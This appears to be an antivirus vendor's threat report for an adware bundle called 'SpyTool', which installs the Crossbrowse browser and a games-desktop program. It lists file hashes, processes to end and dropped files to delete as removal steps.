c466ce7d02c7b0ee5160c1d40e10fdbfc:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\nacl64.exe
e5aed26e81a2567fe8f71e51feed2ed7c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\pdf.dll
14b1d2a3a4b5f74541292de251244f66c:\Program Files\Crossbrowse\Crossbrowse\Application\crossbrowse.exe
d2a7b8934eb6ff84efc6479c91c8081bc:\Program Files\Crossbrowse\Crossbrowse\Application\utility.exe
7f6a928f07d1035cfe07401521d81925c:\Program Files\gmsd_re_005010077\gamesdesktop_widget.exe
d39359e174af9b54277e4f7b89956a0fc:\Program Files\gmsd_re_005010077\gmsd_re_005010077.exe
304073b3e9037d4c26b1509a80eb21eec:\Program Files\gmsd_re_005010077\predm.exe
0ff72e16329a69960686a61ea9943c1dc:\Program Files\gmsd_re_005010077\unins000.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nsg13.tmp:912
    %original file name%.exe:1504
    nsa19.tmp:648
    nsa19.tmp:364
    gmsd_re_005010077.exe:1880
    fsd34.exe:1368
    nsm32.tmp:444
    setup.exe:564
    taskkill.exe:640
    taskkill.exe:584
    taskkill.exe:952
    upgmsd_re_005010077.exe:1364
    amisid.exe:1512
    amisid.exe:1556
    tasklist.exe:164
    tasklist.exe:1540
    nst16.tmp:1340
    nsh2B.tmp:344
    nsh2B.tmp:1860
    encrypt.exe:560
    encrypt.exe:1400
    encrypt.exe:424
    encrypt.exe:460
    3075.exe:976
    nsiB.tmp:644
    nsw7.tmp:1688
    nst36.tmp:2008
    nsw22.tmp:272

  2. Delete the original SpyTool file.
  3. Delete or disinfect the following files created/modified by the SpyTool:

    %Documents and Settings%\%current user%\Local Settings\Temp\3075.exe (14022 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh2B.tmp (366298 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup[1].exe (123415 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm32.tmp (17616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq3C.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm27.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cmmdWriter[1].exe (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst2C.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn14.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu17.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl33.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd35.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\policyname[1].exe (3808 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse37.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_gmsd_re[1].exe (366298 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw22.tmp (6872 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup_362[1].exe (17616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\lHFcE[1].exe (11704 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (20572 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3E.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiB.tmp (11704 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi23.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\VuuPC_VO2_8907[1].exe (15336 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\vos[1].htm (853 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq3D.tmp (15336 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa5.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp (853 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb31.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc8.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst36.tmp (3808 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Validate[1].exe (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg1E.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\df4a6a3ed77e60d6758afca091ca0c1f[1].exe (6872 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg13.tmp (123415 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf11.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiA.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso4.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr20.tmp (6085 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\nsisos.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\md5dll.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\amisid.exe (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\checks.txt (544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\thankyou[1].php (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\post_reply.htm (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\Registry.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq1C.tmp (6085 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\amisid.exe (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\Registry.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\checks.txt (544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\gmsd_re_005010077\1.20\cnf.cyl (269 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\serlib.dll (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\OfferScreen_12.html (1681 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\Offer1.zip (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\registry.dll (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\img12_1.jpg (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\header.bmp (1568 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\OfferScreen_460.html (2281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\Offer2.zip (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\SecondResult.txt (599 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\FirstResult.txt (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DSS_Unq_IMapplication_mon_remote[1].htm (599 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\nsDialogs.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\inner.png (146 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\manlib.dll (26 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\nsCBHTML5.dll (1660 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\blowfish.dll (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\nsisunz.dll (211 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\GetVersion.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\Math.dll (2489 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\OfferInstaller.exe (1617 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\fsd34.exe (388270 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\FinalInstaller_dotnet4[1].exe (1479345 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\libegl.dll (204 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\wow_helper.exe (67 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\VisualElements\splash-620x300.png (11 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\he.pak (254 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\et.pak (202 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe (6841 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\nacl64.exe (12288 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\en-GB.pak (190 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\libexif.dll (303 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\VisualElements\smalllogo.png (9 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Crossbrowse\Crossbrowse.lnk (1 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\bn.pak (1732 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sl.pak (212 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\tr.pak (221 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\pl.pak (221 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\zh-TW.pak (191 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\nb.pak (207 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\lv.pak (226 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\zh-CN.pak (188 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sv.pak (208 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\am.pak (302 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\cs.pak (223 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\ffmpegsumo.dll (6337 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\de.pak (225 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\secondarytile.png (3 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Extensions\external_extensions.json (99 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sw.pak (208 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome_100_percent.pak (7386 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Crossbrowse.lnk (1 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ro.pak (229 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome_child.dll (261193 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\resources.pak (117997 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\fr.pak (240 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe (5873 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\pt-BR.pak (218 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sk.pak (230 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\hi.pak (1713 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome_200_percent.pak (7972 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\hr.pak (214 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\kn.pak (1769 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sr.pak (1611 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome.dll (237340 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\mr.pak (1709 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\fi.pak (213 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\delegate_execute.exe (12288 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\icudtl.dat (76792 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\hu.pak (236 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\es.pak (231 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome_elf.dll (125 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ca.pak (227 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\bg.pak (1641 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\te.pak (1762 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\vi.pak (248 bytes)
    %Documents and Settings%\All Users\Desktop\Crossbrowse.lnk (1 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\th.pak (1702 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\en-US.pak (189 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ta.pak (1784 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\es-419.pak (226 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\39.6.2171.95.manifest (222 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\chrome.7z (1150215 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ja.pak (266 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ml.pak (1827 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\pt-PT.pak (222 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\it.pak (221 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ru.pak (1613 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\gu.pak (1705 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ar.pak (294 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\lt.pak (222 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\fil.pak (228 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\crossbrowse.exe (3869 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\el.pak (1668 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\PepperFlash\pepflashplayer.dll (110258 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\id.pak (203 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\libglesv2.dll (5442 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ko.pak (229 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\VisualElementsManifest.xml (394 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\master_preferences (814 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ms.pak (207 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\nl.pak (217 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\VisualElements\logo.png (5 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\d3dcompiler_46.dll (22433 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe (6841 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\PepperFlash\manifest.json (2 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\pdf.dll (67091 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\metro_driver.dll (1765 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\da.pak (206 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\uk.pak (1622 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\fa.pak (308 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\upgmsd_re_005010077.cyl (428 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (227 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (178 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\nsisos.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw29.tmp (6012 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\Registry.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\thankyou[1].php (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\post_reply.htm (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\amisid.exe (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\checks.txt (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\md5dll.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa1A.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa19.tmp (7288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe (7288 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-A2FKP.tmp (15278 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Program Files%\gmsd_re_005010077\is-9C6SV.tmp (22284 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-IFSM2.tmp (2105 bytes)
    %Program Files%\gmsd_re_005010077\gamesdesktop_widget.exe (77294 bytes)
    %Program Files%\gmsd_re_005010077\gmsd_re_005010077.exe (29430 bytes)
    %Program Files%\gmsd_re_005010077\unins000.dat (29081 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gamesdesktop_widget.7z (15278 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\ex.bat (1564 bytes)
    %Program Files%\gmsd_re_005010077\unins000.msg (375 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\upgmsd_re_005010077.exe (23062 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\CheckProc.cmd (288 bytes)
    %Program Files%\gmsd_re_005010077\predm.exe (2321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\upgmsd_re_005010077.7z (7433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\predm.7z (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\encrypt.exe (4185 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-VS088.tmp (4185 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-V8RVC.tmp (7433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gmsd_re_005010077.7z (8657 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-2EA6S.tmp (8657 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\itdownload.dll (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-Q2DVB.tmp\nsh2B.tmp (3779 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gmsd_re_005010077.exe (31997 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\upgmsd_re_005010077.exe (24223 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\predm.exe (1911 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gamesdesktop_widget.exe (92831 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\prefs (823 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\skype.ico (44 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_plus.ico (64 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\facebook.ico (3913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\expedia.ico (1921 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bing.ico (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\ikea.ico (2993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\skype.ico (1597 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\tripadvisor.ico (1917 bytes)
